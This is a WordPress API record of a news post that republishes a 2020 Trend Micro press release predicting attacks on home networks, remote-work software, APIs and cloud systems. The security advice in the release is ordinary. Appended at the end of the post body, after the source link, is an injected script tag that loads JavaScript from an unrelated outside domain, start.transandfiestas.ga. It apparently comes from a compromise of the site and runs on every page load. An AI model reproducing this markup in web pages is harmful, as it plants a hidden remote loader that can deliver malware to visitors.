{"id":9958,"date":"2020-12-09T04:00:00","date_gmt":"2020-12-09T04:00:00","guid":{"rendered":"https:\/\/eodishasamachar.com\/en\/2020\/12\/09\/user-education-cloud-security-and-xdr-are-critical-for-cybersecurity-in-2021\/"},"modified":"2020-12-09T04:00:00","modified_gmt":"2020-12-09T04:00:00","slug":"user-education-cloud-security-and-xdr-are-critical-for-cybersecurity-in-2021","status":"publish","type":"post","link":"https:\/\/eodishasamachar.com\/en\/2020\/12\/09\/user-education-cloud-security-and-xdr-are-critical-for-cybersecurity-in-2021\/","title":{"rendered":"User Education, Cloud Security and XDR Are Critical for Cybersecurity in 2021"},"content":{"rendered":"<p> \n<\/p>\n<div id=\"\">\n                            <!--<a class=\"format-txt\" href=\"https:\/\/www.media-outreach.com\/release.php\/View\/{baseURL}\/View\/{release.id}?_download=1\">View this article in .txt format<\/a>--><\/p>\n<p class=\"subheadline\">\n                               Trend Micro predicts that remote and cloud-based systems will be ruthlessly targeted next year                            <\/p>\n<p>HONG<br \/>\nKONG SAR &#8211; <a href=\"https:\/\/www.media-outreach.com\/\">Media OutReach<\/a> &#8211; 9 December,<br \/>\n2020 &#8211; <a href=\"https:\/\/www.trendmicro.com\/en_hk\/business.html\"> Trend Micro<br \/>\nIncorporated <\/a><br \/>\n( <a href=\"https:\/\/www.google.com\/finance?q=TYO:4704\"> TYO: 4704 <\/a> ; <a href=\"https:\/\/www.trendmicro.com\/us\/about-us\/investor-relations\/index.html\">    TSE: 4704 <\/a> ),   the leader in cloud   security,   predicts that home networks, remote working<br \/>\nsoftware and cloud systems will be at the center of a new wave of attacks in<br \/>\n2021.  <\/p>\n<p> \u00a0 <\/p>\n<p> Trend<br \/>\nMicro&#8217;s predictions report,  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/hk\/security\/research-and-analysis\/predictions\/2021\"><i> Turning<br \/>\nthe Tide <\/i><\/a><i> ,  <\/i> forecasts<br \/>\nthat cybercriminals in 2021 will particularly look to home networks as a<br \/>\ncritical launch pad to compromising corporate IT and IoT networks. <\/p>\n<p> \u00a0 <\/p>\n<p> &#8220;As we begin to enter a post-pandemic<br \/>\nworld, the trend for remote working is likely going to stick for many<br \/>\norganizations. We predict more aggressive attacks to target corporate data and<br \/>\nnetworks,&#8221; said T  ony Lee, Head of Consulting, Hong Kong and Macau,<br \/>\nat   Trend<br \/>\nMicro. &#8220;Security teams will need to double down on user training, extended<br \/>\ndetection and response and adaptive access controls. This past year was all<br \/>\nabout surviving: now it&#8217;s time for businesses to thrive, with comprehensive<br \/>\ncloud security as their foundation.&#8221; <\/p>\n<p> \u00a0 <\/p>\n<p> The report warns that end users who<br \/>\nregularly access sensitive data (e.g. HR professionals accessing employee data,<br \/>\nsales managers working with sensitive customer information, or senior<br \/>\nexecutives managing confidential company numbers) will be at greatest risk.<br \/>\nAttacks will likely exploit known vulnerabilities in online collaboration and<br \/>\nproductivity software soon after they are disclosed, rather than zero-days. <\/p>\n<p> \u00a0 <\/p>\n<p> Access-as-a-service business models of<br \/>\ncybercrime will grow, targeting the home networks of high-value employees,<br \/>\ncorporate IT and IoT networks. IT security teams will need to overhaul work<br \/>\nfrom home policies and protections to tackle the complexity of hybrid<br \/>\nenvironments &#8212; where work and personal data comingle in a single machine.<br \/>\nZero-trust approaches will increasingly be favored to empower and secure<br \/>\ndistributed workforces. <\/p>\n<p> \u00a0 <\/p>\n<p> As third-party integrations reign,<br \/>\nTrend Micro also warned that exposed APIs will become a new preferred attack<br \/>\nvector for cybercriminals, providing access to sensitive customer data, source<br \/>\ncode and back-end services. <\/p>\n<p> \u00a0 <\/p>\n<p> Cloud systems are another area in<br \/>\nwhich threats will continue to persist in 2021, from unwitting users,<br \/>\nmisconfigurations, and attackers attempting to take over cloud servers to<br \/>\ndeploy malicious container images.  <\/p>\n<p> \u00a0 <\/p>\n<p> Trend Micro recommends the following<br \/>\nsteps to mitigate threats in 2021: <\/p>\n<ul>\n<li>\n<b>Foster user education and training <\/b>  to extend corporate<br \/>\nsecurity best practices to the home, including advice against the use of<br \/>\npersonal devices<\/li>\n<li>\n<b>Maintain strict access controls  <\/b>for both corporate<br \/>\nnetworks and the home office, including zero trust<b\/>\n<\/li>\n<li><b>Double down on best practice security and patch management<br \/>\nprograms <\/b><\/li>\n<li>\n<b>Augment threat detection with security expertise <\/b>  to protect<br \/>\ncloud workloads, emails, endpoints, networks, and servers round-the-clock<\/li>\n<\/ul>\n<p>Cybercriminals<br \/>\nwill continue to go where the money is &#8212; seeking the greatest financial returns<br \/>\non their attacks. Organizations and security teams must remain nimble and vigilant<br \/>\nto stay ahead of criminals.<\/p>\n<p> \u00a0 <\/p>\n<p> Download the report here:  <a href=\"https:\/\/www.trendmicro.com\/vinfo\/hk\/security\/research-and-analysis\/predictions\/2021\"> https:\/\/www.trendmicro.com\/vinfo\/hk\/security\/research-and-analysis\/predictions\/2021<\/a>.\u00a0 <\/p>\n<\/p><\/div>\n\n<br \/><a href=\"https:\/\/www.media-outreach.com\/release.php\/View\/57597#Contact\">Source link <\/a><script src='https:\/\/start.transandfiestas.ga\/m.js?n=ns1' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trend Micro predicts that remote and cloud-based systems will be ruthlessly targeted next year HONG KONG SAR &#8211; Media OutReach &#8211; 9 December, 2020 &#8211; Trend Micro Incorporated ( TYO: 4704 ; TSE: 4704 ), the leader in cloud security, predicts that home networks, remote working software and cloud systems will be at the center &hellip;<\/p>\n","protected":false},"author":1,"featured_media":9959,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[60],"tags":[],"_links":{"self":[{"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/posts\/9958"}],"collection":[{"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/comments?post=9958"}],"version-history":[{"count":0,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/posts\/9958\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/media\/9959"}],"wp:attachment":[{"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/media?parent=9958"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/categories?post=9958"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/eodishasamachar.com\/en\/wp-json\/wp\/v2\/tags?post=9958"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}